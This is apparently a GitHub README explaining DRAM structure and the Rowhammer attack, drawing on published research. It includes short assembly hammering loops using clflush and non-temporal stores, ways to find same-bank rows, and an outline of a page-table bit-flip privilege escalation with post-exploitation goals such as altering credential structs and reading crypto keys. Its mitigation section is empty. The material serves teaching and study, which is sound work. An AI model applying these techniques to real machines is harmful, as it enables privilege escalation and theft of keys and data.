How is DRAM Organised?

Intro

Usually, DRAM is connected to the CPU through a channel. Modern Organisations have more channels (e.g., dual-channel). A DRAM has two "sides" known as ranks. The front of the DRAM is rank-0 and the back is rank-1. A DRAM contains various chips in an organisation like the following:

A chip is subdivided in multiple banks and each bank is subdivided in various rows. Usually each row is 8KB and stores data in bits in physical memory.

Reading from DRAM

When the CPU wants to access a row in memory (e.g., row 1), we have to activate the row and the activated row is copied to the row buffer, then the value from the row buffer is returned to the CPU. If the CPU wants to access a different row, the process starts again, evicting the previous row from the row buffer. I.e., the row buffer acts like a cache for rows. If the CPU wants to access a row that is in the row buffer, we have a row hit, if the row is NOT in the row buffer, there is a row conflict.

Refreshing the DRAM

Constraint from the physical world:

The cells leak charge over time.
Content of the cells has to be refreshed repetitively to keep data integrity.

To refresh the DRAM, the process is: The data from the DRAM cells is read into the row buffer, and then the same data is written back to the cells. DDR3 and DDR4 have some standards that specify the maximum interval between refreshes to guarantee data integrity.

Problem:

Cells leak faster upon proximate accesses. This means that if we access two neighboring cells, the surrounding cells leak charge faster, meaning that the next refresh might not be fast enough to refresh the cells and keep data integrity.

Rowhammer

It's like breaking into an apartment by repeatedly slamming the neighbor's door until the vibrations open the door you were after. - Motherboard Vice

Let's say for example, we want to flip bits in row 2, what we can do is activating intermittently rows 1 & 3. The whole process explained above is repeated for every activation of the two rows. By doing this long enough, we could have bit flips in row 2. (given that the memory module on the machine is vulnerable!)

How can we flip bits?

In order to exploit the rowhammer vulnerability, the memory accesses MUST be:

uncached (i.e., every access must physically reach the DRAM)
fast (we want to have as many accesses between row refreshes, i.e., we are racing against the next row refresh)
targeted (we need to reach two specific rows to have the bit flips in the middle row)

The CPU cache lies between the CPU core and the DRAM, therefore only non-cached accesses actually reach the DRAM. There are two choices we can make:

Flush the cache after having put the data in the cache.
Don't put the data in the cache in the first place.

There are four access techniques to achieve the goal of having the next access being served directly from DRAM:

CLFLUSH instruction (x86) (Kim et al. 2014)
Cache eviction (Aweke et al. 2016)
Non-temporal accesses (Qiao et al. 2016)
Uncached memory (Veen et al. 2016)

In the first access technique we start by accessing the data, which is loaded in the cache and then we flush it from cache (clflush), and then we loop indefinitely in a reload-flush sequence until we get bit flips.

hammer:
  mov (X), %eax //Read from address X
  mov (Y), %ebx //Read from address Y
  clflush (X) //Flush cache for address X
  clflush (Y) //Flush cache for address Y
  jmp hammer //Loop indefinitely

For the "hammer" routine to work (i.e., cause bit flips), addresses X and Y MUST map to different rows of DRAM in the same bank.

In the second access technique, Aweke et al. showed that an attacker can force the cache to invalidate its content by accessing memory addresses belonging to the same cache eviction set. On modern processors, last-level caches have very high associativity (8- or 16-way). Therefore, many memory accesses are required to evict a cache block, and this slows down the rowhammering process (NOT ideal). In this approach also the replacement policy of the cache matters (e.g., on modern caches replacement policy is usually NOT LRU).

In the third access technique we use non-temporal accesses, i.e., when we access data once and NOT in the immediate future, and therefore the data is not put into the cache (low temporal-locality data) because it would be evicted anyways. Hence, we can use "Non-Temporal Access (NTA) instructions" in order to bypass the cache, which are there to minimise cache pollution. All the non-temporal stores to a single address are combined in one Write-Combining (WC) buffer, and ONLY the LAST write goes straight to DRAM (no matter how many stores) meaning that the rate would not be sufficient to "hammer". The trick (Qiao et al.) is to follow the non-temporal store by a cache access to the same address.

hammer:
  movnti %eax, (X)
  movnti %eax, (Y)
  mov %eax, (X)
  mov %eax (Y)
  jmp hammer

The fourth access technique is good especially on mobile devices:

On ARMv7 the flush instruction is privileged
Cache eviction seems to be too slow
On ARMv8 non-temporal stores are still cached in practice.

Since v4.0, Android has been using ION memory management. Apps can use the interface /dev/ion for uncached, physically contiguous memory, and no privilege and permissions are needed (Veen et al.).

How can we target accesses?

Using the physical address mapping

This method uses the knowledge of how the CPU's memory controller maps physical addresses to DRAM's row, column and bank numbers along with the knowledge of either:

The absolute physical addresses of memory we have access to (/proc/<PID>/pagemap)
The relative physical addresses of memory we have access to. Linux allows this through its support for "huge pages", which cover 2MB of contiguous physical address space per page. Whereas a normal 4KB page is smaller than a typical DRAM row, a 2MB page will typically cover multiple rows, some of which will be in the same bank.

Kim et al. take Y = X + 8MB

Another approach is to reverse engineer the mapping by using timing analysis. We can exploit the timing difference between a row hit and a row conflict, if we see a row conflict for an address pair we know they MUST map to the same bank but to a different row (why? -- row buffer keeps only one row).

To reverse your own DRAM

Random address selection

Features like /proc/<PID>/pagemap and "huge pages" are not available on any system (Linux-Specific). Another approach is to choose address pairs at random. We can allocate a very large block of memory (e.g., 1GB) and then pick random virtual addresses within that block. On a machine with 16 DRAM banks, we have a 1/16 chance that the chosen addresses are in the same bank. We could increase the chances of successful row hammering by modifying the hammer routine to hammer more addresses per loop-iteration.

Double-sided hammering

Research has shown that to increase the chances of getting bit flips in row N, it is better to row-hammer both its direct neighbors (i.e., rows (N-1) and (N+1)) rather than hammering one neighbor and a more distant row. This is called double-sided hammering.

Double-sided hammering however, is more complicated due to the fact that an attacker has to know/guess what the offset will be, in physical address space, between two rows that are in the same bank and are adjacent. This has been dubbed as the row offset.

Doing double-sided hammering requires us to pick physically-contiguous pages, e.g., via /proc/<PID>/pagemap or "huge pages".

How do we exploit bit flips?

Even though the bit flips produced by rowhammering seem as if they are random, they follow highly reproducible patterns. Given we hammer a certain memory location x, the probability p, that we flip bits in the same location where we flipped bits before is extremely high.

Exploitation through PTEs

Page Table Entries

A 64-bit Page Table Entry (PTE) usually has the following format:

A PTE has the following status bits:

P (bit 0): Indicates if page table is present in physical memory.
RW (bit 1): Read-only or read-write access permission for reachable pages.
US (bit 2): User or kernel (supervisor) mode access permission for reachable pages.
WT (bit 3): Write-through or write-back policy.
UC (bit 4): Caching enabled or disabled.
R (bit 5): Reference bit (set by MMU on reads & writes, cleared in software).
D (bit 6): Dirty bit set if the page is written to.
S (bit 7): Size bit (Usually 4KB or 4MB for Level 1 PTEs only).
G (bit 8): Global bit set to avoid eviction from TLB on task switch.
X/NX (bit 63): No eXecute bit.

As we can see from the diagram above, bits 9-11 and bits 52-62 are ignored, and therefore causing a bit flip in that area would just be ignored by the CPU. Bits 12-51, are used by the physical page number. Each 4KB page table consists of 2^9 = 512 of such entries.

Managing Page Tables

A typical mapping of a virtual address space is something like:

The aim of this exploit is to get access to a page table, which gives access to all of physical memory. The strategy for this exploit can be something as follows:

Allocate a large chunk of memory.
Search for locations prone to flipping.
Check if the yfall into the "right spot" (RW bit or Physical Page Number) in a PTE for allowing the exploit.
Return that particular area of memory to the OS.
Force the OS to reuse the memory for PTEs by allocating a lot of address space.
Cause the bit flip (shift PTE to point into the page table).
Abuse R/W access to all of physical memory.

Post-Rowhammer Exploitation

When scanning the entire physical memory, there are various operations we can do:

Modify binary pages executed in root privileges (Xiao et al. 2016)
Modify credential structs (Veen et al. 2016)
Read Crypto keys (Xiao et al. 2016)
Corrupt RSA signatures (Bhattacharya et al. 2016)
Modify certificates.
And More...

How do we mitigate Rowhammer?

Sources

Back to Top

Name		Name	Last commit message	Last commit date
Latest commit History 38 Commits
DRAM chip.png		DRAM chip.png
README.md		README.md
_config.yml		_config.yml
pt man.png		pt man.png
pte.png		pte.png

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Contents

How is DRAM Organised?

Intro

Reading from DRAM

Refreshing the DRAM

Problem:

Rowhammer

How can we flip bits?

How can we target accesses?

Using the physical address mapping

Random address selection

Double-sided hammering

How do we exploit bit flips?

Exploitation through PTEs

Page Table Entries

Managing Page Tables

Post-Rowhammer Exploitation

How do we mitigate Rowhammer?

Sources

About

Releases

Packages

hammertux/rowhammering

Folders and files

Latest commit

History

Repository files navigation

Contents

How is DRAM Organised?

Intro

Reading from DRAM

Refreshing the DRAM

Problem:

Rowhammer

How can we flip bits?

How can we target accesses?

Using the physical address mapping

Random address selection

Double-sided hammering

How do we exploit bit flips?

Exploitation through PTEs

Page Table Entries

Managing Page Tables

Post-Rowhammer Exploitation

How do we mitigate Rowhammer?

Sources

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages